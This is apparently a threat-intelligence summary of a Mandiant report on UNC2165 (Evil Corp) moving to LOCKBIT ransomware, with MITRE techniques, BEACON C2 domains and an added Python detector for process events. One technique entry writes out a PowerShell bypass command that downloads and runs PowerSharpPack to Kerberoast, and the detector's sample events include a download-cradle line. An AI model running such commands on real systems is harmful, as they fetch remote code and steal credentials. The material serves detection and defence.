To HADES and Back: UNC2165 Shifts to LOCKBIT to Evade Sanctions

The report analyzes UNC2165 as overlapping with Evil Corp activity and shifting toward ransomware deployments such as HADES and LOCKBIT, leveraging FAKEUPDATES, BEACON, and post-exploitation techniques to breach networks while evading sanctions. It traces the actor's evolution from DRIDEX/FAKEUPDATES infrastructure to affiliate-style ransomware operations and highlights indicators linking UNC2165 to Evil Corp, alongside potential SilverFish overlaps and BEACON C2 activity.

hashtags: #UNC2165 #EvilCorp #FAKEUPDATES #BEACON #WASTEDLOCKER #GOLDWINTER #GOLDDRAKE #LOCKBIT

Key points

  • UNC2165 likely represents an evolution of Evil Corp affiliated activity, with links to DRIDEX/FAKEUPDATES and overlaps in infrastructure and ransomware families.
  • Initial access primarily comes from FAKEUPDATES infections that deliver BEACON loaders, sometimes using suspected stolen credentials.
  • HADES ransomware is deployed by UNC2165 and shares code/functional similarities with Evil Corp operations; BEACON C&C infrastructure is a recurring element.
  • BEACON payloads and their C&C servers have been publicly reported in association with Evil Corp activity and are linked to UNC2165 via multiple artifacts.
  • The operation shows heavy credential theft and privilege escalation (Mimikatz, Kerberoasting) and extensive use of post-exploitation tools and scripts.
  • Lateral movement relies on BEACON with RDP/SSH, VPNs, and creation of new local accounts; defense evasion includes Defender/AV bypass and registry modifications.
  • Data exfiltration, via Rclone or MEGASync, often precedes encryption, and there is a trend toward using RaaS (LOCKBIT) to accelerate ransomware deployment.

MITRE Techniques

  • [T1189] Drive-by Compromise –
    UNC2165 has primarily gained access to victim organizations via FAKEUPDATES infections that ultimately deliver loaders to deploy BEACON samples on impacted hosts.
  • [T1127.001] MSBuild –
    A command appearing in a screenshot within the ProDaft report is consistent with UNC2165 activity. This command reportedly executes a BEACON payload that communicates with the C&C domain tanzaniafisheries[.]com from a .csproj file using msbuild.exe.
  • [T1059.001] PowerShell –
    cmd.exe /C cmd /c powershell -nop -exec bypass -c iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/PowerSharpPack/master/PowerSharpPack.ps1'); PowerSharpPack -Rubeus -Command "kerberoast"
  • [T1218.011] Rundll32 –
    The COLORFAKE DLL is placed within %ProgramData% as a .tmp file, renamed to a DLL, and subsequently executed by RunDLL32 with its export function.
  • [T1047] Windows Management Instrumentation –
    UNC2165 has used WMI to stop and uninstall anti-virus products and other Windows Services prior to ransomware deployment.
  • [T1112] Modify Registry –
    UNC2165 modifies multiple Windows Registry keys with the aim of removing barriers to ransomware execution.
  • [T1562.001] Disable or Modify Tools –
    UNC2165 disables utilities commonly used by administrators, such as Windows Task Manager, registry tools, and the command prompt.
  • [T1562.004] Disable or Modify System Firewall/Defenses –
    UNC2165 disables Windows Defender and clears Windows event logs as part of the final ransomware execution stages.
  • [T1021.001] Remote Desktop Protocol –
    The threat actors moved laterally within victim environments via RDP.
  • [T1021.004] SSH –
    The threat actors connected via SSH to enterprise storage systems using PuTTY.
  • [T1053.005] Scheduled Task –
    UNC2165 uses scheduled tasks as part of execution and persistence (referenced under the report's broader Execution/Discovery patterns).
  • [T1558.003] Kerberoasting –
    UNC2165 conducts Kerberoasting attacks to obtain extensive credential access in target environments.
  • [T1003.001] LSASS Memory –
    UNC2165 uses Mimikatz to obtain credentials, combined with Kerberoasting to expand access.
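As an added example (not part of this summary or of the Mandiant report), a small Python detector that scores constructed process-creation events against three of the execution patterns listed above: MSBuild run on a .csproj staged in an unusual directory, RunDLL32 invoking an export of a DLL dropped in %ProgramData%, and a PowerShell download cradle launched with -nop/-exec bypass. The sample events, the rundll32 export name, the download URL and the "unusual directory" list are constructed assumptions, not values from the report.

```python
import re
from dataclasses import dataclass


@dataclass
class ProcEvent:
    host: str
    parent: str    # parent process image name
    image: str     # process image name
    cmdline: str   # full command line


# Directories where a build file has no business living on an ordinary workstation.
# The page names %ProgramData% for the COLORFAKE DLL; the other entries are assumptions.
_ODD_DIR = re.compile(r"\\(programdata|users\\public|appdata|temp)\\", re.I)


def _image_is(e, name):
    return e.image.lower().endswith(name)


def msbuild_csproj(e):
    # T1127.001: msbuild.exe compiling a .csproj that sits under an odd directory
    m = re.search(r"(\S+\.csproj)\b", e.cmdline, re.I)
    return _image_is(e, "msbuild.exe") and m is not None and bool(_ODD_DIR.search(m.group(1)))


def rundll32_programdata(e):
    # T1218.011: rundll32.exe calling an export of a DLL located in %ProgramData%
    return _image_is(e, "rundll32.exe") and bool(
        re.search(r"\\programdata\\[^\s,]+\.dll\s*,\s*\w+", e.cmdline, re.I))


def powershell_cradle(e):
    # T1059.001: profile/policy bypass flags combined with an in-memory download cradle
    c = e.cmdline.lower()
    return _image_is(e, "powershell.exe") and ("-nop" in c or "-exec bypass" in c) \
        and "iex" in c and "downloadstring" in c


RULES = [("T1127.001", msbuild_csproj), ("T1218.011", rundll32_programdata),
         ("T1059.001", powershell_cradle)]


def detect(events):
    """Return (host, technique id) for every event that matches a rule."""
    return [(e.host, tid) for e in events for tid, rule in RULES if rule(e)]


SAMPLE_EVENTS = [  # constructed events; export name and URL are placeholders
    ProcEvent("WS01", "cmd.exe", "msbuild.exe", r"msbuild.exe C:\ProgramData\tmp\task.csproj"),
    ProcEvent("WS01", "cmd.exe", "rundll32.exe", r"rundll32.exe C:\ProgramData\VIDRESZR1.dll,ExportName"),
    ProcEvent("WS02", "cmd.exe", "powershell.exe",
              "powershell -nop -exec bypass -c iex(new-object net.webclient).downloadstring('https://example.invalid/p.ps1')"),
    ProcEvent("DEV01", "devenv.exe", "msbuild.exe", r"msbuild.exe C:\Users\dev\source\app\app.csproj"),  # benign build
    ProcEvent("WS03", "explorer.exe", "rundll32.exe", "rundll32.exe shell32.dll,Control_RunDLL"),      # benign
]

if __name__ == "__main__":
    for host, tid in detect(SAMPLE_EVENTS):
        print(host, tid)
```

The benign developer build and the stock shell32 invocation are included to show that the rules key on the staging directory and cradle flags rather than on the binary name alone.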

Indicators of Compromise

  • [Domain] tanzaniafisheries.com – BEACON C2 domain used by UNC2165 payloads via .csproj-based loaders.
  • [Domain] mwebsoft.com – BEACON C&C server domain reported by others as Evil Corp related activity.
  • [Domain] rostraffic.com – BEACON C&C artifact linked to Evil Corp activity.
  • [Domain] consultane.com – BEACON C&C artifact linked to Evil Corp activity.
  • [Domain] traffichi.com – BEACON C&C artifact linked to Evil Corp activity.
  • [Domain] amazingdonutco.com – BEACON C&C artifact linked to Evil Corp activity.
  • [Domain] cofeedback.com – BEACON C&C artifact linked to Evil Corp activity.
  • [Domain] adsmarketart.com – BEACON C&C artifact linked to Evil Corp activity.
  • [Domain] websitelistbuilder.com – BEACON C&C artifact linked to Evil Corp activity.
  • [Domain] advancedanalysis.beadsmarketart.com – BEACON C&C artifact linked to Evil Corp activity.
  • [Domain] beadsmarketart.com – BEACON C&C artifact linked to Evil Corp activity.
  • [Domain] cutyoutube.com – BEACON C&C artifact linked to SilverFish/UNC2165 activity.
  • [Domain] onlinemoula.com – BEACON C&C artifact linked to SilverFish/UNC2165 activity.
  • [File] VIDRESZR1.dll – COLORFAKE loader DLL placed in %ProgramData% and executed via RunDLL32.
  • [File] fileid = '190' – payload retrieval reference used by the FAKEUPDATES loader (content fetched by fileid).

Read more: https://www.mandiant.com/resources/unc2165-shifts-to-evade-sanctions